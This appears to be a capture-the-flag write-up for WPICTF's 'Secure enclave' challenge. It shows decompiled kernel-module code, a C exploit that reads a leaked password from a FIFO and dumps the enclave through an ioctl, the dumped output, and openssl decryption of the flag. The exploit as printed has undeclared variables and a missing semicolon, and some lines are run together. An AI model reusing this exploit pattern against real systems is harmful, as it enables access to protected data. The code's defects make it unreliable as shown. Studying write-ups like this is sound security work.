Rating: 5.0

# Secure enclave challenge @WPICTF
Looking at the decompiled secure_enclave.ko, we find

c

...

ulong check_pass(void *param_1)

{
int iVar1;

iVar1 = memcmp(pass,param_1,0x20);
return (ulong)(iVar1 == 0);
}

{
int iVar1;
long lVar2;
undefined4 *puVar3;
undefined4 *puVar4;
byte bVar5;

bVar5 = 0;
lVar2 = _copy_from_user(param_1,param_2,0x220);
if ((lVar2 == 0) && (iVar1 = check_pass(param_1 + 0x80), iVar1 != 0)) {
lVar2 = 0x80;
puVar3 = (undefined4 *)data;
puVar4 = param_1;
while (lVar2 != 0) {
lVar2 = lVar2 + -1;
*puVar4 = *puVar3;
puVar3 = puVar3 + (ulong)bVar5 * 0x3ffffffffffffffe + 1;
puVar4 = puVar4 + (ulong)bVar5 * 0x3ffffffffffffffe + 1;
}
lVar2 = _copy_to_user(param_2,param_1,0x220);
if (lVar2 == 0) {
return 0;
}
}
return 0xfffffff3;


Looking around in the file system, we find a FIFO queue called keydist, which emitts a 32-char string repeatedly (which I guess is the flaw here, it should only be passed once to the keydist process).

bash
localhost:/tmp$cat keydist.fifo | hexdump 0000000 d9da 5f59 754d bddd a319 9860 ede0 f500 0000010 2562 9ad0 1a71 f3b8 1255 9d6d 9cc7 5303 0000020 d9da 5f59 754d bddd a319 9860 ede0 f500 0000030 2562 9ad0 1a71 f3b8 1255 9d6d 9cc7 5303  Here is the include file associated with secure_enclave: c #ifndef _SECURE_ENCLAVE_H #define _SECURE_ENCLAVE_H #include <sys/ioctl.h> #define ENCLAVE_SIZE 512 #define PASS_SIZE 32 typedef struct { char data[ENCLAVE_SIZE]; char pass[PASS_SIZE]; } secure_enclave_ctx; #define SECURE_ENCLAVE_READ _IOR('s', 1, secure_enclave_ctx*) #define SECURE_ENCLAVE_WRITE _IOW('s', 2, secure_enclave_ctx*) #define SECURE_ENCLAVE_CLEAR _IOR('s', 3, secure_enclave_ctx*) #endif  Exploit code c #include <fcntl.h> #include <unistd.h> #include <string.h> #include <stdio.h> #include <sys/ioctl.h> #include <sys/stat.h> #include <sys/secure_enclave.h> #define ENCLAVE_READ 0x80087301 void dump(char *buf, size_t len){ for(int i = 0; i < len; i++){ printf("%02x ", buf[i] & 0xff); if ((i+1) % 0x20 == 0) printf("\n"); } printf("\n"); } int main(){ secure_enclave_ctx c; char pass[sizeof c.pass]; char data[sizeof c.data]; fd = open("/tmp/keydist.fifo", O_RDONLY); read(fd, &pass, 32); close(fd); memset(&c, 0, sizeof c); memcpy (&(c.pass), &pass, sizeof pass); memcpy (&(c.data), &data, sizeof data); if ((fd = open("/dev/secure_enclave", O_RDWR)) < 0) { perror("open"); return -1; } ioctl(fd, ENCLAVE_READ, &c) printf("key: \n"); dump(c.pass, sizeof c.pass); printf("retval: 0x%08x\n\n", r); printf("data: \n"); dump(c.data, sizeof c.data); return 0; }  Running the exploit: bash localhost:~$ ./a.out
key:
da d9 59 5f 4d 75 dd bd 19 a3 60 98 e0 ed 00 f5 62 25 d0 9a 71 1a b8 f3 55 12 6d 9d c7 9c 03 53

data:
50 72 69 76 61 74 65 20 64 61 74 61 2c 20 70 6c 65 61 73 65 20 64 6f 6e 27 74 20 72 65 61 64 2e
0a 4b 65 79 20 6c 69 73 74 0a 32 34 33 38 32 39 34 37 33 32 39 34 32 39 38 34 33 32 39 5f 61 6a
73 64 68 66 6f 69 77 65 68 6f 69 62 65 6f 67 65 6e 76 78 7a 75 65 77 69 72 6f 77 71 72 68 77 65
72 68 20 2d 20 75 6e 75 73 65 64 0a 69 27 6d 61 62 65 74 74 65 72 68 61 63 6b 65 72 74 68 61 6e
72 65 6d 79 20 2d 20 63 74 66 20 70 61 73 73 77 6f 72 64 0a 70 6c 65 61 73 65 6d 61 6b 65 63 68
61 6c 6c 65 6e 67 65 73 66 6f 72 77 70 69 63 74 66 20 2d 20 63 74 66 20 70 61 73 73 77 6f 72 64
20 32 0a 64 74 65 72 6d 69 73 63 61 6e 63 65 6c 6c 65 64 20 2d 20 6a 75 73 74 69 6e 27 73 20 70
61 73 73 77 6f 72 64 0a 6c 69 6e 75 78 69 73 74 68 65 62 65 73 74 6f 73 5f 61 6c 6c 74 68 65 77
69 6e 64 6f 77 73 6c 6f 76 65 72 73 61 72 65 6a 75 73 74 62 61 64 61 74 70 72 6f 67 72 61 6d 6d
69 6e 67 20 2d 20 73 75 70 65 72 20 73 65 63 72 65 74 20 66 69 6c 65 20 70 61 73 73 77 6f 72 64
0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
da d9 59 5f 4d 75 dd bd 19 a3 60 98 e0 ed 00 f5 62 25 d0 9a 71 1a b8 f3 55 12 6d 9d c7 9c 03 53
6b 65 79 64 69 73 74 0a 09 20 2d 72 20 20 20 20 20 20 20 20 20 20 53 74 61 72 74 20 69 6e 20 72
65 61 64 20 6d 6f 64 65 0a 09 20 2d 77 20 20 20 20 20 20 20 20 20 20 53 74 61 72 74 20 69 6e 20
77 72 69 74 65 20 6d 6f 64 65 0a 00 00 00 00 00 2f 74 6d 70 2f 6b 65 79 64 69 73 74 2e 66 69 66
6f 00 00 00 01 1b 03 3b 40 00 00 00 07 00 00 00 4c ed ff ff 5c 00 00 00 5c ee ff ff 84 00 00 00

Key list
2438294732942984329_ajsdhfoiwehoibeogenvxzuewirowqrhwerh - unused


What is the encryption used?

bash
localhost:~$cat flag.enc|hd 00000000 53 61 6c 74 65 64 5f 5f 8b d2 02 ff 25 ca d8 9a |Salted__....%...| 00000010 c7 f4 bb 0d 8f 78 b4 b5 70 c7 ea 13 c9 fb 54 e4 |.....x..p.....T.| 00000020 fe e3 ea 9c 55 1b 66 00 93 f6 a4 99 2c 17 7a 6a |....U.f.....,.zj| 00000030 0f b9 d8 f9 1a a0 08 6f f7 cd 29 54 cc 98 db 29 |.......o..)T...)| 00000040 53 f9 c9 fa 7c ce 5f e5 4e f7 9a 87 cd 38 fa c6 |S...|._.N....8..| 00000050  Using the password linuxisthebestos_allthewindowsloversarejustbadatprogramming to decrypt the file using OpenSSL: bash localhost:~$ openssl aes-256-cbc -d -in flag.enc -out blah.txt
*** WARNING : deprecated key derivation used.
Using -iter or -pbkdf2 would be better.
localhost:~$cat blah.txt Well that was fun. WPI{@curl3$$_1$_@n_3pic_H@XOR}


Original writeup (https://gist.github.com/grocid/e6df8c8d466a8fc5396e56c0b0234ba3).
lior5654April 22, 2020, 6:55 p.m.